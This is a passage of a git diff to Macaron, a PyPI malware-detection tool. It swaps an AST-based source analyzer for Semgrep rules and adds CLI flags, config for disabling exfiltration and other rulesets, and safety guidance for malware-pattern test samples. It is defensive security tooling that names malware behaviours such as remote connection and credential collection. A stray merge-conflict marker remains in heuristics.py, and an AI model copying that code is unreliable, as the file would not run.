--git a/scripts/dev_scripts/samples_permissions_checker.sh b/scripts/dev_scripts/samples_permissions_checker.sh new file mode 100755 index 000000000..fcbd3658b --- /dev/null +++ b/scripts/dev_scripts/samples_permissions_checker.sh @@ -0,0 +1,37 @@ +#!/usr/bin/env bash + +# Copyright (c) 2022 - 2025, Oracle and/or its affiliates. All rights reserved. +# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. + +# +# Checks if the files in tests/malware_analyzer/pypi/resources/sourcecode_samples have executable permissions, +# failing if any do. +# + +# Strict bash options. +# +# -e: exit immediately if a command fails (with non-zero return code), +# or if a function returns non-zero. +# +# -u: treat unset variables and parameters as error when performing +# parameter expansion. +# In case a variable ${VAR} is unset but we still need to expand, +# use the syntax ${VAR:-} to expand it to an empty string. +# +# -o pipefail: set the return value of a pipeline to the value of the last +# (rightmost) command to exit with a non-zero status, or zero +# if all commands in the pipeline exit successfully. +# +# Reference: https://www.gnu.org/software/bash/manual/html_node/The-Set-Builtin.html. +set -euo pipefail + +MACARON_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && cd ../.. 
&& pwd)" +SAMPLES_PATH="${MACARON_DIR}/tests/malware_analyzer/pypi/resources/sourcecode_samples" + +# any files have any of the executable bits set +executables=$( ( find "$SAMPLES_PATH" -type f -perm -u+x -o -type f -perm -g+x -o -type f -perm -o+x | sed "s|$MACARON_DIR/||"; git ls-files "$SAMPLES_PATH" --full-name) | sort | uniq -d) +if [ -n "$executables" ]; then + echo "The following files should not have any executable permissions:" + echo "$executables" + exit 1 +fi diff --git a/src/macaron/__main__.py b/src/macaron/__main__.py index 03549db7f..7e380d989 100644 --- a/src/macaron/__main__.py +++ b/src/macaron/__main__.py @@ -96,6 +96,10 @@ def analyze_slsa_levels_single(analyzer_single_args: argparse.Namespace) -> None global_config.local_maven_repo = user_provided_local_maven_repo + if analyzer_single_args.force_analyze_source and not analyzer_single_args.analyze_source: + logger.error("'--force-analyze-source' requires '--analyze-source'.") + sys.exit(os.EX_USAGE) + analyzer = Analyzer(global_config.output_path, global_config.build_log_path) # Initiate reporters. @@ -172,8 +176,9 @@ def analyze_slsa_levels_single(analyzer_single_args: argparse.Namespace) -> None analyzer_single_args.sbom_path, deps_depth, provenance_payload=prov_payload, - validate_malware=analyzer_single_args.validate_malware, verify_provenance=analyzer_single_args.verify_provenance, + analyze_source=analyzer_single_args.analyze_source, + force_analyze_source=analyzer_single_args.force_analyze_source, ) sys.exit(status_code) @@ -477,10 +482,22 @@ def main(argv: list[str] | None = None) -> None: ) single_analyze_parser.add_argument( - "--validate-malware", + "--analyze-source", required=False, action="store_true", - help=("Enable malware validation."), + help=( + "For improved malware detection, analyze the source code of the" + + " (PyPI) package using a textual scan and dataflow analysis." 
+ ), + ) + + single_analyze_parser.add_argument( + "--force-analyze-source", + required=False, + action="store_true", + help=( + "Forces PyPI sourcecode analysis to run regardless of other heuristic results. Requires '--analyze-source'." + ), ) single_analyze_parser.add_argument( diff --git a/src/macaron/config/defaults.ini b/src/macaron/config/defaults.ini index 5e5f6d9a3..8bda9e942 100644 --- a/src/macaron/config/defaults.ini +++ b/src/macaron/config/defaults.ini @@ -615,4 +615,27 @@ scaling = 0.15 cost = 1.0 # The path to the file that contains the list of popular packages. popular_packages_path = ->>>>>>> 1c65d5f (feat(security): add package name typosquatting detection (#1059)) + +# ==== The following sections are for source code analysis using Semgrep ==== +# rulesets: a reference to a 'ruleset' in this section refers to a Semgrep .yaml file containing one or more rules. +# rules: a reference to a 'rule' in this section refers to an individual rule ID, specified by the '- id:' field in +# the Segmrep .yaml file. +# default rulesets: these are a collection of rulesets provided with Macaron which are run by default with the sourcecode +# analyzer. These live in src/macaron/resources/pypi_malware_rules. +# custom rulesets: this is a collection of user-provided rulesets, living inside the path provided to 'custom_semgrep_rules_path'. + +# disable default semgrep rulesets here (i.e. all rule IDs in a Semgrep .yaml file) using ruleset names, the name +# without the .yaml prefix. Currently, we disable the exfiltration rulesets by default due to a high false positive rate. +# This list may not contain duplicated elements. Macaron's default ruleset names are all unique. +disabled_default_rulesets = exfiltration +# disable individual rules here (i.e. individual rule IDs inside a Semgrep .yaml file) using rule IDs. You may also +# provide the IDs of your custom semgrep rules here too, as all Semgrep rule IDs must be unique. 
This list may not contain +# duplicated elements. +disabled_rules = +# absolute path to a directory where a custom set of semgrep rules for source code analysis are stored. These will be included +# with Macaron's default rules. The path will be normalised to the OS path type. +custom_semgrep_rules_path = +# disable custom semgrep rulesets here (i.e. all rule IDs in a Semgrep .yaml file) using ruleset names, the name without the +# .yaml prefix. Note, this will be ignored if a path to custom semgrep rules is not provided. This list may not contain +# duplicated elements, meaning that ruleset names must be unique. +disabled_custom_rulesets = diff --git a/src/macaron/errors.py b/src/macaron/errors.py index 34ab1da89..d5983a0bc 100644 --- a/src/macaron/errors.py +++ b/src/macaron/errors.py @@ -109,3 +109,7 @@ class HeuristicAnalyzerValueError(MacaronError): class LocalArtifactFinderError(MacaronError): """Happens when there is an error looking for local artifacts.""" + + +class SourceCodeError(MacaronError): + """Error for operations on package source code.""" diff --git a/src/macaron/malware_analyzer/README.md b/src/macaron/malware_analyzer/README.md index af8451279..4e63e1818 100644 --- a/src/macaron/malware_analyzer/README.md +++ b/src/macaron/malware_analyzer/README.md @@ -1,4 +1,4 @@ -# Implementation of Heuristic Malware Detector +# Implementation of Malware Detector ## PyPI Ecosystem @@ -56,6 +56,20 @@ When a heuristic fails, with `HeuristicResult.FAIL`, then that is an indicator b - **Description**: Checks if the package name is suspiciously similar to any package name in a predefined list of popular packages. The similarity check incorporates the Jaro-Winkler distance and considers keyboard layout proximity to identify potential typosquatting. - **Rule**: Return `HeuristicResult.FAIL` if the similarity ratio between the package name and any popular package name meets or exceeds a defined threshold; otherwise, return `HeuristicResult.PASS`. 
- **Dependency**: None. +### Source Code Analysis with Semgrep + +The following analyzer has been included as an optional feature, available by supplying `--analyze-source` in the CLI to `macaron analyze`: + +**PyPI Source Code Analyzer** +- **Description**: Uses Semgrep, with default rules written in `src/macaron/resources/pypi_malware_rules` and custom rules available by supplying a path to `custom_semgrep_rules` in `defaults.ini`, to scan the package `.tar` source code. +- **Rule**: If any Semgrep rule is triggered, the heuristic fails with `HeuristicResult.FAIL` and subsequently fails the package with `CheckResultType.FAILED`. If no rule is triggered, the heuristic passes with `HeuristicResult.PASS` and the `CheckResultType` result from the combination of all other heuristics is maintained. +- **Dependency**: Will be run if the Source Code Repo fails. This dependency can be bypassed by suppying `--force-analyze-source` in the CLI, along with `--analyze-source`. + +This feature is currently a work in progress, and supports detection of code obfuscation techniques and remote exfiltration behaviors. It uses Semgrep OSS for detection. `defaults.ini` may be used to provide custom rules and exclude them: +- `disabled_default_rulesets`: supply to this a comma separated list of the names of default Semgrep rule files (excluding the `.yaml` extension) to disable all rule IDs in that file. +- `disabled_rules`: supply to this a comma separated list of individual rule IDs to disable (from both the default and custom list). +- `custom_semgrep_rules`: supply to this an absolute path to a directory containing custom Semgrep `.yaml` files to be run alongside the default ones. +- `disabled_custom_rulesets`: supply to this a comma separated list of the names of custom Semgrep rule files (excluding the `.yaml` extension) to disable all rule IDs in that file. 
### Contributing @@ -64,6 +78,7 @@ When contributing an analyzer, it must meet the following requirements: - The analyzer must be implemented in a separate file, placed in the relevant folder based on what it analyzes ([metadata](./pypi_heuristics/metadata/) or [sourcecode](./pypi_heuristics/sourcecode/)). - The analyzer must inherit from the `BaseHeuristicAnalyzer` class and implement the `analyze` function, returning relevant information specific to the analysis. - The analyzer name must be added to [heuristics.py](./pypi_heuristics/heuristics.py) file so it can be used for rule combinations in [detect_malicious_metadata_check.py](../slsa_analyzer/checks/detect_malicious_metadata_check.py) +- The analyzer must be added to the list of analyzers in `detect_malicious_metadata_check.py` to be run. - Update the `malware_rules_problog_model` in [detect_malicious_metadata_check.py](../slsa_analyzer/checks/detect_malicious_metadata_check.py) with logical statements where the heuristic should be included. When adding new rules, please follow the following guidelines: - Provide a [confidence value](../slsa_analyzer/checks/check_result.py) using the `Confidence` enum. - Ensure it is assigned to the `problog_result_access` string variable, otherwise it will not be queried and evaluated. @@ -71,6 +86,39 @@ When contributing an analyzer, it must meet the following requirements: - Make sure to wrap pass/fail statements in `passed()` and `failed()`. Not doing so may result in undesirable behaviour, see the comments in the model for more details. - If there are commonly used combinations introduced by adding the heuristic, combine and justify them at the top of the static model (see `quickUndetailed` and `forceSetup` as current examples). 
+**Contributing Code Pattern Rules** + +When contributing more Semgrep rules for `pypi_sourcecode_analyzer.py` to use, the following requirements must be met: + +- Semgrep `.yaml` Rules are stored in `src/macaron/resources/pypi_malware_rules` and are named based on the category of code behaviors they detect. +- If the rule comes under one of the already defined categories, place it within that `.yaml` file, else create a new `.yaml` file using the category name. +- Each rule ID must be prefixed by the category followed by a single underscore ('_'), so for obfuscation rules in `obfuscation.yaml` each rule ID is prefixed with `obfuscation_`, followed by an ID which uses a hyphen ('-') as a separator. +- Tests must be written for each rule contributed. These are stored in `tests/malware_analyzer/pypi/test_pypi_sourcecode_analyzer.py`. +- These tests are written on a per-category basis, running each category individually. Each category must have a folder under `tests/malware_analyzer/pypi/resources/sourcecode_samples`. +- Within these folders, there must be sample code patterns for testing, and a file `expected_results.json` with the expected JSON output of the analyzer for that category. +- Each sample code pattern `.py` file must not have executable permissions and must include code that prevents it from being accidentally imported or run. The current files use this method: + +``` +""" +Running this code will not produce any malicious behavior, but code isolation measures are +in place for safety. +""" + +import sys + +# ensure no symbols are exported so this code cannot accidentally be used +__all__ = [] +sys.exit() + +def test_function(): + """ + All code to be tested will be defined inside this function, so it is all local to it. This is + to isolate the code to be tested, as it exists to replicate the patterns present in malware + samples. 
+ """ + sys.exit() +``` + ### Confidence Score Motivation The original seven heuristics which started this work were Empty Project Link, Unreachable Project Links, One Release, High Release Frequency, Unchange Release, Closer Release Join Date, and Suspicious Setup. These heuristics (excluding those with a dependency) were run on 1167 packages from trusted organizations, with the following results: diff --git a/src/macaron/malware_analyzer/pypi_heuristics/heuristics.py b/src/macaron/malware_analyzer/pypi_heuristics/heuristics.py index b9f743a55..c46904fca 100644 --- a/src/macaron/malware_analyzer/pypi_heuristics/heuristics.py +++ b/src/macaron/malware_analyzer/pypi_heuristics/heuristics.py @@ -45,6 +45,9 @@ class Heuristics(str, Enum): TYPOSQUATTING_PRESENCE = "typosquatting_presence" >>>>>>> 1c65d5f (feat(security): add package name typosquatting detection (#1059)) + #: Indicates that the package source code contains suspicious code patterns. + SUSPICIOUS_PATTERNS = "suspicious_patterns" + class HeuristicResult(str, Enum): """Result type indicating the outcome of a heuristic.""" diff --git a/src/macaron/malware_analyzer/pypi_heuristics/pypi_sourcecode_analyzer.py b/src/macaron/malware_analyzer/pypi_heuristics/pypi_sourcecode_analyzer.py deleted file mode 100644 index edf7a1830..000000000 --- a/src/macaron/malware_analyzer/pypi_heuristics/pypi_sourcecode_analyzer.py +++ /dev/null @@ -1,491 +0,0 @@ -# Copyright (c) 2024 - 2024, Oracle and/or its affiliates. All rights reserved. -# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. - -""" -Detect suspicious function calls in the code and trace the arguments back to their original values. - -This allows for deeper analysis of potentially malicious behavior. 
-""" - -import ast -import base64 -import binascii -import ipaddress -import logging -import os -import pathlib -import re - -import yaml - -from macaron.json_tools import JsonType -from macaron.slsa_analyzer.package_registry.pypi_registry import PyPIPackageJsonAsset - -logger: logging.Logger = logging.getLogger(__name__) - - -class DataFlowTracer(ast.NodeVisitor): - """The class is used to create the symbol table and analyze the dataflow.""" - - def __init__(self) -> None: - self.symbol_table: dict = {} # Store variable assignments - self.trace_path: list = [] - - def visit_Assign(self, node: ast.Assign) -> None: # noqa: N802 # pylint: disable=C0103 - """Visit the Assign node and build the symbol table.""" - for target in node.targets: - if isinstance(target, ast.Name): - target_name = target.id - if isinstance(node.value, ast.Name): - self.symbol_table[target_name] = str(node.value.id) - elif isinstance(node.value, ast.Constant): - self.symbol_table[target_name] = str(node.value.value) - # Handle other assignment types as needed (e.g., function calls, lists) - else: - self.symbol_table[target_name] = ast.unparse(node.value) - self.generic_visit(node) # Important for visiting nested assign - - def trace_back(self, variable_name: str) -> list: - """Get the full path of the dataflow. - - Parameters - ---------- - variable_name: str - The argument of the function call. - - Returns - ------- - list - The path of the dataflow. - """ - self.trace_path = [] - self._recursive_trace(variable_name) - return self.trace_path - - def _recursive_trace(self, variable_name: str) -> None: - """Recursively build the dataflow path by analyzing the symbol table. - - Parameters - ---------- - variable_name: str - The argument of the function call. 
- """ - if variable_name in self.symbol_table: - value = self.symbol_table[variable_name] - if not self.trace_path: - self.trace_path.extend([variable_name, value]) - else: - self.trace_path.append(value) - if ( - isinstance(value, str) and value in self.symbol_table and self.symbol_table[value] != value - ): # only trace if it is a var name - self._recursive_trace(value) - - def generate_symbol_table(self, source_code: str) -> None: - """Generate the symbol table. - - Parameters - ---------- - source_code: str - The source code of the script. - """ - tree = ast.parse(source_code) - self.visit(tree) - - -class PyPISourcecodeAnalyzer: - """This class is used to analyze the source code.""" - - def __init__(self, pypi_package_json: PyPIPackageJsonAsset) -> None: - """Collect required data for analysing the source code.""" - self.source_code: dict[str, str] | None = pypi_package_json.get_sourcecode() - self.suspicious_pattern: dict[str, JsonType] | None = self._load_suspicious_pattern() - # self.extracted_suspicious_content: dict[str, JsonType] = {} - self.analysis_result: dict = {} - self.is_malware: bool = False - - def analyze(self) -> tuple[bool, dict]: - """Analyze the source code of the PyPI package. - - Returns - ------- - dict - The result of the analysis. - """ - if self.source_code and self.suspicious_pattern: - for filename, content in self.source_code.items(): - try: - imports = self._extract_imports_from_ast(content) - except SyntaxError: - imports = self._extract_imports_from_lines(content) - - if isinstance(self.suspicious_pattern["imports"], list): - suspicious_imports: set[str] | None = imports & set(self.suspicious_pattern["imports"]) - else: - suspicious_imports = None - - # No suspicious imports in the source code. Skip the further steps. - if not suspicious_imports: - logger.debug("No suspicious imports found in the file %s", filename) - continue - - # TODO: Currently the symbol table stores the data for dataflow analysis. 
- # In the future, the dataflow will be more complicated and even handle the cross-file dataflow. - tracer = DataFlowTracer() - tracer.generate_symbol_table(content) - logger.debug(tracer.symbol_table) - - # TODO: In the future, the probability policy to decide the file is malicious or not - # will be implemented. Therefore, the functioncall_analyzer.analyze() will return detail_info - # and analysis result. - functioncall_analyzer = FunctionCallAnalyzer(self.suspicious_pattern, tracer) - is_malware, detail_info = functioncall_analyzer.analyze(content) - if is_malware: - self.is_malware = is_malware - - # TODO: Currently, the result collector does not handle the situation that - # multiple same filename. In the future, this will be replace with absolute path. - if detail_info: - self.analysis_result[filename] = detail_info - - # TODO: Implement other suspicious setup in suspicious_pattern.yaml - # pattern = r"install_requires\s*=\s*\[(.*?)\]" - # matches: re.Match | None = re.search(pattern, content, re.DOTALL) - # if matches: - # install_requires: set[str] | None = set(re.findall(r"'(.*?)'", matches.group(1))) - # if ( - # install_requires - # and install_requires & set(self.suspicious_pattern["imports"]) - # and len(install_requires) < 4 - # # This threshold is based on historical malwares - # ): - # extracted_data["install_requires"] = install_requires - # TODO: In the future this result from each file will be used to calculate the probability. - # Then the is_malicious will be based on this value. 
- # Currently, the default policy is - return self.is_malware, self.analysis_result - - # def extract_susupicious_content(self) -> None: - # """Extract the suspicious content from the source code.""" - # if not self.source_code or not self.suspicious_pattern: - # return - # self.extracted_suspicious_content = self._extract_suspicious_content_from_source() - - def _load_suspicious_pattern(self) -> dict[str, JsonType] | None: - """Load the suspicious pattern from suspicious_pattern.yaml. - - Returns - ------- - dict[str, JsonType] | None - The suspicious pattern. - """ - filename: str = "suspicious_pattern.yaml" - curr_dir: pathlib.Path = pathlib.Path(__file__).parent.absolute() - suspicious_pattern_file: str = os.path.join(curr_dir, filename) - with open(suspicious_pattern_file, encoding="utf-8") as file: - try: - suspicious_pattern: dict[str, JsonType] = yaml.safe_load(file) - except yaml.YAMLError as yaml_exception: - logger.debug("Error parsing the yaml file: '%s'", yaml_exception) - return None - return suspicious_pattern - - def _extract_imports_from_ast(self, content: str) -> set[str]: - """Extract imports from source code using the parsed AST. - - Parameters - ---------- - source_content: str - The source code as a string. - - Returns - ------- - set[str] - The set of imports. - - Raises - ------ - SyntaxError - If the code could not be parsed. - """ - imports = set() - tree = ast.parse(content) - for node in ast.walk(tree): - if isinstance(node, ast.Import): - for alias in node.names: - imports.add(alias.name) - elif isinstance(node, ast.ImportFrom): - module = node.module - if module: - _module = "." * node.level + module - imports.add(_module) - for name in node.names: - imports.add(_module + "." + name.name) - - return imports - - def _extract_imports_from_lines(self, content: str) -> set[str]: - """Extract imports from source code using per line pattern matching. - - Parameters - ---------- - source_content: str - The source code as a string. 
- - Returns - ------- - set[str] - The list of imports. - """ - alias_pattern = r"\s+as\s+\w+(?:\.{0,1}\w+)*" - # Pattern for module aliases. - - module_name = r"\w+(?:\.{0,1}\w+" - # as described under pattern_import. - - pattern_import = ( - r"(?:import\s+)(" + module_name + r")*(?:" + alias_pattern + r")?" - r"(?:(?:\s*,\s*)(?:" + module_name + r")*(?:" + alias_pattern + r")?))*)(?:(?:\s|#).*)?" - ) - # Allows for a standard import statement. - # E.g.: import - # Where consists of one or more . - # Where consists of one or more words (a-z or 0-9 or underscore) separated by periods, - # with an optional alias. - # Where allows any character(s) either after a single space or a hash (#). - - pattern_from_import = ( - r"(?:from\s+)([.]*" - + module_name - + r")*)(?:\s+import\s+(\w+(?:\s+as\s+\w+)?(?:(?:\s*,\s*)(?:\w+(?:\s+as\s+\w+)?))*))" - ) - # Allows for a from import statement. - # E.g.: from import - # Where is as above, but can also be preceded by any number of periods. - # (Note only a single module can be placed here.) - # Where consists of one or more with optional aliases. - # Where is identical to except without any periods. - # Where requires at least one space followed by one or more word characters, plus - # any other characters following on from that. - - combined_pattern = f"^(?:{pattern_import})|(?:{pattern_from_import})$" - # The combined pattern creates two match groups: - # 1 - standard import statement. - # 2 - from import statement module. - # 3 - from import statement module components. - - imports = set() - for line in content.splitlines(): - line.strip() - match = re.match(combined_pattern, line) - if not match: - continue - - if match.group(1): - # Standard import, handle commas and aliases if present. 
- splits = self._prune_aliased_lines(match.group(1), alias_pattern) - for split in splits: - imports.add(split) - elif match.group(2): - # From import - imports.add(match.group(2)) - if match.group(3): - splits = self._prune_aliased_lines(match.group(3), alias_pattern) - for split in splits: - imports.add(match.group(2) + "." + split) - - return imports - - def _prune_aliased_lines(self, text: str, alias_pattern: str) -> list[str]: - """Split the line on commas and remove any aliases from individual parts.""" - results = [] - splits = text.split(",") - for split in splits: - split = split.strip() - results.append(re.sub(alias_pattern, "", split)) - return results - - -class FunctionCallAnalyzer(ast.NodeVisitor): - """This class analyzes Python source code to identify potential suspicious behavior.""" - - def __init__(self, suspicious_pattern: dict, tracer: DataFlowTracer) -> None: - """Initialize the analyzer. - - Parameters - ---------- - suspicious_pattern: dict - The suspicious behaviour mainly includes the function call and constant. - """ - self.suspicious_patterns: dict = suspicious_pattern - self.analysis_detail: dict = { - "OS Detection": {}, - "Code Execution": {}, - "Information Collecting": {}, - "Remote Connection": {}, - "Custom Setup": {}, - "Obfuscation": {}, - } - self.tracer = tracer - self.is_malware = False - - def visit_Module(self, node: ast.Module) -> None: # noqa: N802 # pylint: disable=C0103 - """Visit all root node.""" - self.generic_visit(node) - - # TODO: Detect OS might generate false alert. - # def visit_If(self, node: ast.If) -> None: - # """Visit the If node.""" - # if isinstance(node.test, ast.Compare): - # unparsed_expr: str = ast.unparse(node) - # # Some malware excute different malicious code based on the victims OS. 
- # for os_detection_constant in self.suspicious_patterns["ast_constant"]["os_detection"]: - # if os_detection_constant in unparsed_expr: - # TODO: This function is required to be implemented with dataflow analysis - # self.analysis_detail["OS Detection"][node.lineno] = unparsed_expr - # self.is_malware = True - # self.generic_visit(node) - - def visit_Call(self, node: ast.Call) -> None: # noqa: N802 # pylint: disable=C0103 - """Visit the Call node.""" - suspicious_calls: dict = self.suspicious_patterns["ast_calls"] - suspicious_const: dict = self.suspicious_patterns["ast_constant"] - function_call: str = ast.unparse(node.func) - args: str = " ".join([ast.unparse(arg) for arg in node.args]) - expr: str = ast.unparse(node) - trace_path: list = self.tracer.trace_back(args) - path: str = "" - if trace_path: - path = " ->".join(trace_path) - for call_type in suspicious_calls: - if self._is_malware(suspicious_calls[call_type], function_call): - for constant_type in suspicious_const: # Further confirmed by checking the arguments - if ( - self._is_malware(suspicious_const[constant_type], args) - or IP().extract_public_ipv4(args) - or self._is_malware(suspicious_const[constant_type], Decryptor().base64_decode(args)) - ): - self._summarize_analysis_detail(call_type, node.lineno, expr) - self.is_malware = True - elif self._is_malware(suspicious_const[constant_type], path): - self._summarize_analysis_detail(call_type, node.lineno, expr, path) - self.is_malware = True - self.generic_visit(node) - - def visit_ClassDef(self, node: ast.ClassDef) -> None: # noqa: N802 # pylint: disable=C0103 - """Visit the ClassDef node. This function is used to detect malicious behavior in setup.py.""" - if not node.bases: - self.generic_visit(node) - return - - for base in node.bases: - if isinstance(base, ast.Name): - if base.id == "install": - # TODO: Not pretty sure including this in setup.py means it is a malware, so the self.is_malware is not updated. 
- self.analysis_detail["Custom Setup"][node.lineno] = node.name - self.generic_visit(node) - - def _summarize_analysis_detail( - self, function_call_type: str, lineno: int, expr: str, trace_path: str | None = None - ) -> None: - """Store the analysis result in based on different type of malicious behaviour. - - Parameters - ---------- - function_call_type: str - The suspcious function call type. - lineno: int - The location of the source code block. - expr: str - The source code block. - trace_path: str - The dataflow path. - """ - detail = [expr] - - if trace_path: - detail.append(trace_path) - - match function_call_type: - case "code_execution": - self.analysis_detail["Code Execution"][lineno] = detail - case "info_collecting": - self.analysis_detail["Information Collecting"][lineno] = detail - case "remote_connection": - self.analysis_detail["Remote Connection"][lineno] = detail - case "obfuscation": - self.analysis_detail["Obfuscation"][lineno] = detail - - def _is_malware(self, malicious_pattern: list, target: str | None) -> bool: - """Check the source code matched the suspicious pattern. - - Parameters - ---------- - malicious_pattern: list - A collection of the suspicious source code. - target: str - The componenet of the source code block. - - Returns - ------- - bool - The result. - """ - if not target: - return False - for _ in malicious_pattern: # pylint: disable=C0103, C0501 - if _ in target: - return True - return False - - def analyze(self, source_code: str) -> tuple[bool, dict]: - """Analyze the source code.""" - tree = ast.parse(source_code) - self.visit(tree) - return self.is_malware, self.analysis_detail - - -class Decryptor: - """This class includes multiple built-in decryption methods.""" - - # Only decrypt the string with the built-in decrypt method; otherwise, provide the source code - # for the user. And notify them to decrypt using the corresponding decrypt method - # TODO: Implement more decryption method. 
- - def __init__(self) -> None: - pass - - def base64_decode(self, encoded_value: str | bytes) -> str | None: - """Decode the encoded value.""" - try: - decoded_bytes = base64.b64decode(encoded_value) - return decoded_bytes.decode("utf-8") - except (binascii.Error, UnicodeDecodeError): - return None - - -class IP: - """This class provides the method to identify the IP in the source code.""" - - def __init__(self) -> None: - pass - - def is_valid_public_ipv4(self, ip: str) -> bool: - """Check whether it is a public IPv4.""" - try: - ip_obj = ipaddress.ip_address(ip) - return ip_obj.version == 4 and not ip_obj.is_private and not ip_obj.is_loopback - except ValueError: - # If ip_address() raises an error, it's not a valid IP - return False - - def extract_public_ipv4(self, text: str) -> list: - """Extract the public IPv4 from the source code.""" - ipv4_pattern = r"\b(?:[0-9]{1,3}\.){3}[0-9]{1,3}\b" - all_ips = re.findall(ipv4_pattern, text) - # Filter valid public IPv4 addresses - valid_public_ipv4s = [] - for ip in all_ips: - if self.is_valid_public_ipv4(ip): - valid_public_ipv4s.append(ip) - return valid_public_ipv4s diff --git a/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py b/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py new file mode 100644 index 000000000..c6805dece --- /dev/null +++ b/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py @@ -0,0 +1,330 @@ +# Copyright (c) 2024 - 2025, Oracle and/or its affiliates. All rights reserved. +# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. + +""" +Detect suspicious function calls in the code and trace the arguments back to their original values. + +This allows for deeper analysis of potentially malicious behavior. 
+""" + +import glob +import json +import logging +import os +import subprocess # nosec +import tempfile + +import yaml + +from macaron.config.defaults import defaults +from macaron.config.global_config import global_config +from macaron.errors import ConfigurationError, HeuristicAnalyzerValueError +from macaron.json_tools import JsonType, json_extract +from macaron.malware_analyzer.pypi_heuristics.base_analyzer import BaseHeuristicAnalyzer +from macaron.malware_analyzer.pypi_heuristics.heuristics import HeuristicResult, Heuristics +from macaron.slsa_analyzer.package_registry.pypi_registry import PyPIPackageJsonAsset + +logger: logging.Logger = logging.getLogger(__name__) + + +class PyPISourcecodeAnalyzer(BaseHeuristicAnalyzer): + """This class is used to analyze the source code of python PyPI packages. This analyzer is a work in progress. + + Currently the analyzer performs textual pattern matching and dataflow analysis using the open-source features of + Semgrep. Semgrep open-source taint tracking can only perform in one locale, but this is a known limitation. Default + rules are stored in 'macaron/resources/pypi_malware_rules' as semgrep .yaml rule files. A user may add additional + rules stored in a specified directory passed by them in the 'defaults.ini' configuration file. + """ + + def __init__(self, resources_path: str | None = None) -> None: + """ + Initialise the source code analyzer and load default and custom semgrep rulesets. + + Parameters + ---------- + resources_path: str | None + The path to the resources directory which must contain a 'pypi_malware_rules' directory of + semgrep rules. If None is provided, then this is loaded from the global config resources path. + Defaults to None + + Raises + ------ + ConfigurationError + If the default rule path is invalid, the heuristic.pypi entry is not present, or if the semgrep + validation of the custom rule path failed. 
+ """ + super().__init__( + name="suspicious_patterns_analyzer", + heuristic=Heuristics.SUSPICIOUS_PATTERNS, + # We include the SKIP condition here as we want to consider the case where EMPTY_PROJECT_LINK fails, + # meaning SOURCE_CODE_REPO is skipped, as this is still a scenario where the source code repository + # is not available, so we want to run source code analysis. + depends_on=[ + (Heuristics.SOURCE_CODE_REPO, HeuristicResult.FAIL), + (Heuristics.SOURCE_CODE_REPO, HeuristicResult.SKIP), + ], + ) + if resources_path is None: + resources_path = global_config.resources_path + self.default_rule_path, self.custom_rule_path, self.disabled_rule_ids = self._load_defaults(resources_path) + + def _load_defaults(self, resources_path: str) -> tuple[str, str | None, set[str]]: + """ + Load the default semgrep rules and, if present, the custom semgrep rules provided by the user. + + Semgrep validation is run on the custom rules provided by the user. + + Parameters + ---------- + resources_path: str + The path to the resources directory which must contain a 'pypi_malware_rules' directory of + semgrep rules. + + Returns + ------- + tuple[str, str | None] + The default rule path and the custom rule path or None if one was not provided + + Raises + ------ + ConfigurationError + If the default rule path is invalid, the heuristic.pypi entry is not present, or if the semgrep + validation of the custom rule path failed. + """ + default_rule_path = os.path.join(resources_path, "pypi_malware_rules") + if not os.path.exists(default_rule_path): + error_msg = f"Error with locating default rule path {default_rule_path}" + logger.debug(error_msg) + raise ConfigurationError(error_msg) + + section_name = "heuristic.pypi" + + if defaults.has_section(section_name): + section = defaults[section_name] + else: + error_msg = f"Unable to find section {section_name}, which must be present." 
+ logger.debug(error_msg) + raise ConfigurationError(error_msg) + + configuration_name = "custom_semgrep_rules_path" + custom_rule_path = section.get(configuration_name) + if not custom_rule_path: # i.e. None or empty string + logger.debug("No custom path listed under %s, using default rules only.", configuration_name) + custom_rule_path = None + else: + custom_rule_path = os.path.normpath(custom_rule_path) + if not os.path.exists(custom_rule_path): + error_msg = f"Unable to locate path {custom_rule_path}" + logger.debug(error_msg) + raise ConfigurationError(error_msg) + + semgrep_commands: list[str] = ["semgrep", "scan", "--validate", "--oss-only", "--config", custom_rule_path] + try: + process = subprocess.run(semgrep_commands, check=True, capture_output=True) # nosec + except (subprocess.CalledProcessError, subprocess.TimeoutExpired) as semgrep_error: + error_msg = ( + f"Unable to run semgrep validation on {custom_rule_path} with arguments " + f"{semgrep_commands}: {semgrep_error}." + ) + logger.debug(error_msg) + raise ConfigurationError(error_msg) from semgrep_error + + if process.returncode != 0: + error_msg = f"Error running semgrep validation on {custom_rule_path} with arguments" f" {process.args}." 
+ logger.debug(error_msg) + raise ConfigurationError(error_msg) + + logger.debug("Including custom ruleset from %s.", custom_rule_path) + + disabled_rule_ids = set() + + disabled_default_rulesets = defaults.get_list(section_name, "disabled_default_rulesets") + if disabled_default_rulesets: + target_files = {f"{name}.yaml" for name in disabled_default_rulesets} + disabled_rule_ids.update(self._extract_rule_ids(default_rule_path, target_files)) + + disabled_custom_rulesets = defaults.get_list(section_name, "disabled_custom_rulesets") + if disabled_custom_rulesets: + if custom_rule_path: + target_files = {f"{name}.yaml" for name in disabled_custom_rulesets} + disabled_rule_ids.update(self._extract_rule_ids(custom_rule_path, target_files)) + else: + logger.warning("Disabled custom rulesets provided without a set of custom rulesets. Ignoring.") + + disabled_rules = defaults.get_list(section_name, "disabled_rules") + if disabled_rules: + disabled_rule_ids.update(set(disabled_rules)) + + if disabled_rule_ids: + logger.debug("Disabling the following rules: %s.", disabled_rule_ids) + + return default_rule_path, custom_rule_path, disabled_rule_ids + + def _extract_rule_ids(self, path: str, target_files: set[str]) -> set[str]: + """ + Extract Semgrep rule IDs from a set of target .yaml Semgrep rules nested inside the provided path. + + Raise an error when not all target Semgrep rule files are found in the provided path or subdirectories + of the provided path. + + Parameters + ---------- + path: str + The path that includes the target Semgrep rules in it or subdirectories of it. + target_files: set[str] + A set of unique Semgrep rule file names (with their .yaml extension) to find in the provided path. + + Returns + ------- + set[str] + A set of unique Semgrep rule IDs extracted from all provided target files. 
